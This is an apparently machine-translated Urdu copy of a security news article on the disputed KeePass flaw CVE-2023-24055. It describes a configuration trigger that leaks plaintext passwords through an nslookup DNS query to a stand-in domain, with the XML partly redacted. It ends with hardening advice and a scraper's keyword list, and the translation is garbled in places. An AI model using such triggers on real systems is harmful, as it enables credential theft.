پاس ورڈ مینیجرز کے لیے یہ چند ہفتے خبروں کے قابل ہیں - وہ آسان یوٹیلیٹیز جو آپ کو ہر ویب سائٹ کے لیے ایک مختلف پاس ورڈ کے ساتھ آنے میں مدد کرتی ہیں جو آپ استعمال کرتے ہیں، اور پھر ان سب پر نظر رکھتے ہیں۔
2022 کے آخر میں، لاسٹ پاس کی باری تھی تمام خبروں میں، جب کمپنی نے آخر کار اعتراف کیا کہ اگست 2022 میں اس کی خلاف ورزی کا سامنا کرنا پڑا، وہ واقعی صارفین کے پاس ورڈ کے ساتھ ختم ہوا۔ والٹ چوری ہو رہے ہیں کلاؤڈ سروس سے جہاں ان کا بیک اپ لیا گیا تھا۔
(پاس ورڈز خود چوری نہیں ہوئے تھے، کیونکہ والٹس کو انکرپٹ کیا گیا تھا، اور LastPass کے پاس خود بیک اپ والٹ فائلوں کے لیے کسی کی "ماسٹر کی" کی کاپیاں نہیں تھیں، لیکن یہ اس سے زیادہ قریب تر شیو تھا جس کو سن کر زیادہ تر لوگ خوش تھے۔)
اس کے بعد لائف لاک کی باری تھی کہ وہ ساری خبروں میں شامل ہو جائے، جب کمپنی نے اس کے بارے میں متنبہ کیا کہ یہ کیا دھبہ لگ رہا ہے۔ پاس ورڈ کا اندازہ لگانے والے حملےممکنہ طور پر کچھ عرصہ پہلے، شاید بالکل مختلف ویب سائٹ سے چوری کیے گئے پاس ورڈز کی بنیاد پر، اور شاید حال ہی میں ڈارک ویب پر خریدے گئے ہوں۔
خود LifeLock کی خلاف ورزی نہیں ہوئی تھی، لیکن اس کے کچھ صارفین نے پاس ورڈ شیئرنگ کے رویے کی بدولت ایسے خطرات پیدا کیے جو شاید انہیں یاد بھی نہ ہوں۔
حریف 1 پاس ورڈ اور BitWarden حال ہی میں خبروں میں رہے ہیں، بدنیتی پر مبنی اشتہارات کی رپورٹوں کی بنیاد پر، بظاہر نادانستہ طور پر Google کی طرف سے نشر کیا گیا، جس نے قائل طور پر صارفین کو اپنے اکاؤنٹ کی تفصیلات کو فشنگ کرنے کے لیے لاگ ان پیجز کی نقل کرنے پر آمادہ کیا۔
اب KeePass کی باری ہے۔ خبروں میں، اس بار سائبر سیکیورٹی کے ایک اور مسئلے کے لیے: ایک مبینہ خطرے کا سامنا, سافٹ ویئر کیڑے کے لیے استعمال ہونے والی جرگن اصطلاح جو سائبرسیکیوریٹی کے سوراخوں کا باعث بنتی ہے جس کا حملہ آور برے مقاصد کے لیے فائدہ اٹھا سکتے ہیں۔
پاس ورڈ سونگھنا آسان ہو گیا۔
ہم اسے ایک کے طور پر حوالہ دے رہے ہیں۔ خطرے کا سامنا یہاں کیونکہ اس میں ایک سرکاری بگ شناخت کنندہ ہے، جو یو ایس نیشنل انسٹی ٹیوٹ فار اسٹینڈرڈز اینڈ ٹیکنالوجی کی طرف سے جاری کیا گیا ہے۔
بگ کو ڈب کیا گیا ہے۔ CVE-2023-24055: ایکس ایم ایل کنفیگریشن فائل تک تحریری رسائی حاصل کرنے والا حملہ آور ایکسپورٹ ٹرگر شامل کرکے کلیئر ٹیکسٹ پاس ورڈ حاصل کر سکتا ہے۔
کلیئر ٹیکسٹ پاس ورڈ حاصل کرنے کے قابل ہونے کا دعویٰ، بدقسمتی سے، سچ ہے۔
اگر مجھے آپ کی ذاتی فائلوں تک رسائی حاصل ہے، بشمول آپ کی نام نہاد %APPDATA%
ڈائریکٹری میں، میں چپکے سے کسی بھی KeePass کی ترتیبات میں ترمیم کرنے کے لیے کنفیگریشن سیکشن کو موافقت کر سکتا ہوں جسے آپ نے پہلے سے ہی اپنی مرضی کے مطابق بنایا ہے، یا اگر آپ نے جان بوجھ کر کچھ تبدیل نہیں کیا ہے تو حسب ضرورت شامل کرنے کے لیے…
…اور میں حیرت انگیز طور پر آپ کے سادہ متن کے پاس ورڈز آسانی سے چرا سکتا ہوں، یا تو بڑی تعداد میں، مثال کے طور پر پورے ڈیٹا بیس کو ایک غیر خفیہ کردہ CSV فائل کے طور پر پھینک کر، یا جب آپ انہیں استعمال کرتے ہیں، مثال کے طور پر ایک "پروگرام ہک" ترتیب دے کر جو ہر بار آپ کے پاس ٹرگر ہوتا ہے۔ ڈیٹا بیس سے پاس ورڈ.
نوٹ کریں کہ مجھے ضرورت نہیں ہے۔ ایڈمنسٹریٹر مراعات، کیونکہ مجھے اصل انسٹالیشن ڈائرکٹری کے ساتھ گڑبڑ کرنے کی ضرورت نہیں ہے جہاں KeePass ایپ محفوظ ہو جاتی ہے، جو عام طور پر باقاعدہ استعمال کرنے والوں کے لیے حد سے زیادہ ہوتی ہے۔
اور مجھے کسی بھی لاک ڈاؤن گلوبل کنفیگریشن سیٹنگز تک رسائی کی ضرورت نہیں ہے۔
دلچسپ بات یہ ہے کہ، KeePass آپ کے پاس ورڈز کو استعمال کرتے وقت آپ کے پاس ورڈز کو سونگھنے سے روکتا ہے، بشمول چھیڑ چھاڑ کے تحفظ کی تکنیکوں کا استعمال کرتے ہوئے ان صارفین سے بھی جن کے پاس پہلے سے ہی سیسڈمین کے اختیارات ہیں۔
لیکن KeePass سافٹ ویئر سادہ متن کے پاس ورڈ ڈیٹا کو حاصل کرنا حیرت انگیز طور پر آسان بناتا ہے، شاید ان طریقوں سے جو آپ غیر منتظمین کے لیے بھی "بہت آسان" سمجھ سکتے ہیں۔
ایک بنانے کے لیے KeePass GUI استعمال کرنا ایک منٹ کا کام تھا۔ ٹریگر ہر بار جب آپ کلپ بورڈ میں پاس ورڈ کاپی کرتے ہیں تو ایونٹ کو چلانے کے لیے، اور اس ایونٹ کو DNS تلاش کرنے کے لیے ترتیب دینے کے لیے جس میں صارف نام اور سادہ متن پاس ورڈ دونوں شامل ہوں:
اس کے بعد ہم اپنی مقامی کنفیگریشن فائل میں سے اس آپشن کے لیے غیر خوفناک حد تک واضح XML سیٹنگ کو سسٹم پر موجود کسی دوسرے صارف کی کنفیگریشن فائل میں کاپی کر سکتے ہیں، جس کے بعد وہ بھی اپنے پاس ورڈز کو DNS تلاش کے ذریعے انٹرنیٹ پر لیک ہونے کا پتہ لگائیں گے۔
اگرچہ XML کنفیگریشن ڈیٹا بڑی حد تک پڑھنے کے قابل اور معلوماتی ہے، KeePass تجسس سے بے ترتیب ڈیٹا سٹرنگز کا استعمال کرتا ہے جسے GUIDs کہا جاتا ہے (مختصر کے لیے عالمی سطح پر منفرد شناخت کنندگانمختلف کی نشاندہی کرنے کے لیے ٹریگر ترتیبات، تاکہ ایک باخبر صارف کو بھی یہ سمجھنے کے لیے ایک وسیع حوالہ جاتی فہرست کی ضرورت ہو کہ کون سے محرکات سیٹ کیے گئے ہیں، اور کیسے۔
یہاں ہمارا DNS لیک ہونے والا ٹرگر کیسا لگتا ہے، حالانکہ ہم نے کچھ تفصیلات کو دوبارہ ترتیب دیا ہے تاکہ آپ اس متن کو براہ راست کاپی اور پیسٹ کر کے کسی بھی فوری شرارت کا سامنا نہ کر سکیں:
XXXXXXXXXXXXXXXXXXXXXX کاپی DNS تلاش کے ذریعے چیزیں چوری کریں۔ XXXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXXX.blah.test سچ ہے۔ 1
اس ٹرگر کے فعال ہونے کے ساتھ، KeePass پاس ورڈ تک رسائی حاصل کرنے سے سادہ متن میری پسند کے ڈومین پر غیر متزلزل DNS تلاش میں نکل جاتا ہے، جو کہ blah.test
اس مثال میں.
نوٹ کریں کہ حقیقی زندگی کے حملہ آور تقریباً یقینی طور پر چوری شدہ متن کو گھماؤ یا مبہم کر دیں گے، جس سے نہ صرف یہ معلوم کرنا مشکل ہو جائے گا کہ جب DNS لیک ہو رہے ہوں گے، بلکہ غیر ASCII حروف پر مشتمل پاس ورڈز کا بھی خیال رکھیں گے، جیسے لہجے والے حروف یا ایموجیز، جسے دوسری صورت میں DNS ناموں میں استعمال نہیں کیا جا سکتا:
لیکن کیا یہ واقعی ایک بگ ہے؟
مشکل سوال، تاہم، یہ ہے، "کیا یہ واقعی ایک بگ ہے، یا یہ صرف ایک طاقتور خصوصیت ہے جس کا غلط استعمال کسی ایسے شخص کے ذریعہ کیا جا سکتا ہے جسے پہلے سے ہی آپ کی نجی فائلوں پر کم از کم اتنا کنٹرول درکار ہوگا جتنا آپ خود رکھتے ہیں؟"
سیدھے الفاظ میں، کیا یہ خطرہ ہے کہ اگر کوئی شخص جس کے پاس پہلے سے ہی آپ کے اکاؤنٹ کا کنٹرول ہے وہ ان فائلوں کے ساتھ گڑبڑ کر سکتا ہے جن تک آپ کا اکاؤنٹ بہرحال رسائی حاصل کر سکتا ہے؟
اگرچہ آپ امید کر سکتے ہیں کہ ایک پی ایس ورڈ مینیجر میں چھیڑ چھاڑ کے تحفظ کی بہت سی اضافی پرتیں شامل ہوں گی تاکہ اس قسم کے کیڑے/خصوصیات کا غلط استعمال کیا جا سکے۔ CVE-2023-24055 واقعی ایک CVE درج شدہ خطرہ ہے؟
اگر ایسا ہے تو، اس طرح کے احکامات نہیں کرے گا DEL
(ایک فائل کو حذف کریں) اور FORMAT
کیا "کیڑے" ہونے کی ضرورت ہے؟
اور کیا PowerShell کا وجود نہیں ہوگا، جو ممکنہ طور پر خطرناک رویے کو اکسانا آسان بنا دیتا ہے (کوشش powerhsell get-clipboard
، مثال کے طور پر)، خود ہی ایک خطرہ بنیں؟
یہ KeePass کی پوزیشن ہے، جس کا اعتراف درج ذیل متن سے کیا گیا ہے جو کہ میں شامل کیا گیا ہے۔ "بگ" کی تفصیل NIST کی ویب سائٹ پر:
** متنازعہ ** […] نوٹ: وینڈر کی پوزیشن یہ ہے کہ پاس ورڈ ڈیٹا بیس کا مقصد کسی ایسے حملہ آور کے خلاف محفوظ نہیں ہے جس کی مقامی پی سی تک اس سطح تک رسائی ہو۔
کیا کیا جائے؟
اگر آپ اسٹینڈ اسٹون KeePass صارف ہیں، تو آپ "DNS Stealer" جیسے بدمعاش ٹرگرز کو چیک کر سکتے ہیں جسے ہم نے اوپر KeePass ایپ کھول کر اور استعمال کر کے بنایا ہے۔ آلات > محرکات… ونڈو:
نوٹ کریں کہ آپ پورے کو موڑ سکتے ہیں۔ ٹریگر سسٹم کو اس ونڈو سے آف کریں، صرف کو غیر منتخب کرکے [ ] Enable trigger system
آپشن…
…لیکن یہ عالمی ترتیب نہیں ہے، اس لیے اسے آپ کی مقامی کنفیگریشن فائل کے ذریعے دوبارہ آن کیا جا سکتا ہے، اور اس لیے آپ کو صرف غلطیوں سے بچاتا ہے، بجائے اس کے کہ آپ کے اکاؤنٹ تک رسائی والے حملہ آور سے۔
آپ عالمی "لاک ڈاؤن" فائل میں ترمیم کر کے کمپیوٹر پر موجود ہر ایک کے لیے آپشن کو زبردستی بند کر سکتے ہیں، ان کے لیے اسے خود پر واپس کرنے کا کوئی آپشن نہیں ہے۔ KeePass.config.enforced.XML
، ڈائرکٹری میں پایا جاتا ہے جہاں ایپ پروگرام خود انسٹال ہوتا ہے۔
اگر آپ کی عالمی XML نفاذ فائل اس طرح نظر آتی ہے تو ٹرگرز کو ہر کسی کے لیے زبردستی بند کر دیا جائے گا:
جھوٹا
(اگر آپ سوچ رہے ہیں تو، ایک حملہ آور جس کے پاس اس تبدیلی کو ریورس کرنے کے لیے ایپلیکیشن ڈائرکٹری تک رسائی ہے، اس کے پاس تقریباً یقینی طور پر سسٹم لیول کی اتنی طاقت ہوگی کہ وہ KeePass ایگزیکیوٹیبل فائل میں ہی ترمیم کرسکے، یا پھر بھی اسٹینڈ اسٹون کیلاگر کو انسٹال اور فعال کرسکے۔)
اگر آپ نیٹ ورک ایڈمنسٹریٹر ہیں جسے آپ کے صارفین کے کمپیوٹرز پر KeePass کو لاک ڈاؤن کرنے کا کام سونپا گیا ہے تاکہ یہ اب بھی ان کی مدد کرنے کے لیے کافی لچکدار ہے، لیکن غلطی سے سائبر کرائمینز کی مدد کرنے کے لیے کافی لچکدار نہیں ہے، تو ہم KeePass کے ذریعے پڑھنے کی تجویز کرتے ہیں۔ سیکیورٹی کے مسائل صفحہ ، محرکات صفحہ، اور نافذ کنفیگریشن صفحہ.
- SEO سے چلنے والا مواد اور PR کی تقسیم۔ آج ہی بڑھا دیں۔
- پلیٹو بلاک چین۔ Web3 Metaverse Intelligence. علم میں اضافہ۔ یہاں تک رسائی حاصل کریں۔
- ماخذ: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- قابلیت
- ہمارے بارے میں
- اوپر
- مطلق
- تک رسائی حاصل
- تک رسائی حاصل
- اکاؤنٹ
- فعال
- شامل کیا
- اعتراف کیا
- اشتھارات
- کے بعد
- کے خلاف
- تمام
- مبینہ طور پر
- پہلے ہی
- اور
- ایک اور
- اپلی کیشن
- درخواست
- اگست
- مصنف
- آٹو
- واپس
- حمایت کی
- پس منظر کی تصویر
- بیک اپ
- کی بنیاد پر
- کیونکہ
- کیا جا رہا ہے
- سرحد
- پایان
- خلاف ورزی
- بگ کی اطلاع دیں
- کیڑوں
- قبضہ
- پرواہ
- کیس
- وجہ
- وجوہات
- سینٹر
- یقینی طور پر
- تبدیل
- حروف
- چیک کریں
- انتخاب
- کا دعوی
- قریب
- بادل
- رنگ
- کس طرح
- کمپنی کے
- مکمل طور پر
- کمپیوٹر
- کمپیوٹر
- حالات
- ترتیب
- غور کریں
- کنٹرول
- کاپیاں
- سکتا ہے
- احاطہ
- تخلیق
- بنائی
- سی ای وی
- cybercriminals
- سائبر سیکیورٹی
- خطرناک
- گہرا
- گہرا ویب
- اعداد و شمار
- ڈیٹا بیس
- تفصیلات
- DID
- مختلف
- براہ راست
- دکھائیں
- DNS
- ڈومین
- نہیں
- نیچے
- ڈوب
- آسان
- آسانی سے
- یا تو
- خفیہ کردہ
- نافذ کرنے والے
- کافی
- پوری
- بھی
- واقعہ
- ہر کوئی
- سب
- مثال کے طور پر
- دھماکہ
- برآمد
- وسیع
- اضافی
- نمایاں کریں
- چند
- فائل
- فائلوں
- آخر
- مل
- لچکدار
- کے بعد
- مجبور
- ملا
- سے
- حاصل
- حاصل کرنے
- گلوبل
- جاتا ہے
- گوگل
- موبائل
- خوش
- ہونے
- اونچائی
- مدد
- یہاں
- سوراخ
- امید ہے کہ
- ہور
- کس طرح
- تاہم
- HTML
- HTTPS
- شناخت
- فوری طور پر
- in
- شامل
- شامل
- سمیت
- معلوماتی
- انسٹال
- مثال کے طور پر
- انسٹی ٹیوٹ
- انٹرنیٹ
- مسئلہ
- جاری
- IT
- خود
- شبدجال
- رکھیں
- جانا جاتا ہے
- بڑے پیمانے پر
- LastPass
- تہوں
- قیادت
- لیک
- لیک
- سطح
- لسٹ
- مقامی
- دیکھا
- دیکھنا
- تلاش
- بنا
- بنا
- بناتا ہے
- مینیجر
- مینیجر
- مارجن
- زیادہ سے زیادہ چوڑائی
- شاید
- غلطی
- غلطیوں
- نظر ثانی کرنے
- سب سے زیادہ
- نام
- قومی
- ضرورت ہے
- نیٹ ورک
- خبر
- نیسٹ
- عام
- حاصل
- سرکاری
- کھولنے
- اختیار
- دوسری صورت میں
- خود
- پیرامیٹر
- پاس ورڈ
- پاس ورڈز
- پال
- PC
- لوگ
- شاید
- ذاتی
- فشنگ
- سادہ متن
- پلاٹا
- افلاطون ڈیٹا انٹیلی جنس
- پلیٹو ڈیٹا
- پوزیشن
- مراسلات
- ممکنہ طور پر
- طاقت
- طاقتور
- اختیارات
- پاورشیل
- نجی
- استحقاق
- شاید
- پروگرام
- خریدا
- مقاصد
- ڈال
- سوال
- بے ترتیب
- ددورا
- پڑھنا
- حال ہی میں
- سفارش
- باقاعدہ
- یاد
- جواب
- اطلاع دی
- رپورٹیں
- ریورس
- خطرات
- رن
- سیکشن
- محفوظ بنانے
- احساس
- سروس
- مقرر
- قائم کرنے
- ترتیبات
- مختصر
- ہونا چاہئے
- صرف
- So
- سافٹ ویئر کی
- ٹھوس
- کچھ
- کسی
- کمرشل
- اسٹینڈ
- معیار
- ابھی تک
- چوری
- بند کرو
- ذخیرہ
- اس طرح
- سمجھا
- SVG
- کے نظام
- لے لو
- تکنیک
- ٹیکنالوجی
- ۔
- ان
- خود
- لہذا
- کے ذریعے
- وقت
- کرنے کے لئے
- بھی
- سب سے اوپر
- ٹریک
- منتقلی
- شفاف
- ٹرگر
- سچ
- ٹرن
- تبدیل کر دیا
- عام طور پر
- منفرد
- URL
- us
- استعمال کی شرائط
- رکن کا
- صارفین
- افادیت
- مختلف
- والٹ
- والٹس
- کی طرف سے
- خطرے کا سامنا
- W3
- طریقوں
- ویب
- ویب سائٹ
- مہینے
- کیا
- جس
- ڈبلیو
- گے
- سوچ
- کام
- گا
- لکھنا
- XML
- اور
- اپنے آپ کو
- زیفیرنیٹ